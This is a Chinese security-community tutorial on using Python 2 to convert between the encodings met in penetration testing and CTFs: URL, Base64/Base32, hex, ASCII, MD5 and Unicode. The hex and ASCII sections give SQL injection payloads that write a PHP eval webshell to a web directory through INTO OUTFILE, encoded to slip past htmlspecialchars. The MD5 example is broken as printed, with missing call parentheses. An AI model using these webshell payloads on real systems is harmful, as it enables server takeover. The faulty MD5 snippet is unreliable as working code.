妙用python之編碼轉換

內容來源：i春秋社區

歡迎關注i春秋公眾號（微信搜索：icqedu）了解更多技術乾貨，未經許可禁止轉載。

文章難易度：★★

知識點：python、編碼轉換

前 言

在日常滲透，漏洞挖掘，甚至是CTF比賽中，會遇到各種編碼，常常伴隨著這些編碼之間的各種轉換。記得剛入門那個時候，自己處理編碼轉換問題往往是「百度：url解碼、base64加密、hex……」，或者是使用一款叫做「小葵多功能轉換工具」的軟體，再後來直接上Burpsuite的decoder功能，感覺用的還挺好的。不過，也遇到些問題：在線轉換效率低(搜索佔去了2/3的時間)、兩款工具存在一些小問題，比如burp中涉及中文往往顯示亂碼。

直到使用python來作為我日常編碼轉換工具……

開啟py轉換之旅

1

url編碼

url編碼是一種瀏覽器用來打包表單輸入的格式.可謂是一名作為web人員最熟悉的一種編碼方式了。

[Python]

>>> from urllib import *

>>> quote("union select null,null,null")

'union%20select%20null%2Cnull%2Cnull'

>>> unquote("union%20select%20null%2Cnull%2Cnull")

'union select null,null,null'

>>> urlencode({'x':'2333','y':'666'})

'y=666&x=2333'

2

Base64

Base64常常用作網頁表單和HTTP傳輸的一些參數，也常用於郵件協議傳輸用戶信息等。

[Python]

>>> import base64

>>> base64.b64encode("admin")

'YWRtaW4='

>>> base64.b64decode('YWRtaW4=')

'admin'

記得有次ctf比賽中考到了base32解密，一般網站不提供在線解密，一時之間貌似沒有辦法繼續下去。不過如果你使用python的話會像上邊解密base64一樣簡單，只需要將函數改變下：

[Python]

>>> import base64

>>> base64.b32encode('jjjjj')

'NJVGU2TK'

>>> base64.b32decode('NJVGU2TK')

'jjjjj'

3

Hex

十六進位編碼也是web application中常見的一種編碼方案。作為一名web安全人員，我們心知肚明的是，MySQL注入可以使用hex繞過htmlspecialchars函數從而寫入webshell。比如：

[SQL]

select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'

下面是python實現hex加解密的方法：

[Python]

>>> '<?php @eval($_POST[a]); ?>'.encode('hex')

'3c3f70687020406576616c28245f504f53545b615d293b203f3e'

>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')

<?php @eval($_POST[a]); ?>

4

Ascii

MySQL中的char函數則是轉換ascii碼的，正因如此，也可以使用這個特性來繞過htmlspecialchars函數。比如：

[SQL]

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'

使用python將字元串轉換ascii很簡單，但是逆轉換的話需要需要點小操作：

[Python]

>>> map(ord, "<?php phpinfo ?>")

[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]

>>> print chr(112)

p

>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]

>>> print ''.join(map(chr,l)) #這裡採用pcat表哥指出的方法

<?php phpinfo ?>

5

Md5

md5在web安全界可以說是人盡皆知了，以他的不可逆性，大多數網站存儲用戶密碼等關鍵數據時常常使用md5加密。有的時候我們提交payload需要md5加密，這個時候用下面的方法就可以輕鬆實現。當然解密的話推薦去cmd5。

[Python]

>>> from hashlib import md5

>>> m = md5

>>> m.update('this is a secret')

>>> m.hexdigest

'7dbbcee180ba4d456e4aa1cfbdad9c7b'

>>> m.hexdigest[8:-8]

'80ba4d456e4aa1cf'

6

Unicode轉中文

unicode轉換中文，很多情況下都能遇到。尤其是在做滲透測試的時候。用burp的話會存在中文亂碼的問題，在python下實現非常簡單。

[Python]

>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"

你需要重新登陸

後記

python實際上在實際使用中非常方便，編碼轉換隻是其中一個例子。文中提到的編碼轉換皆為筆者日常積累，如果有沒有涉及到的地方，歡迎評論補充。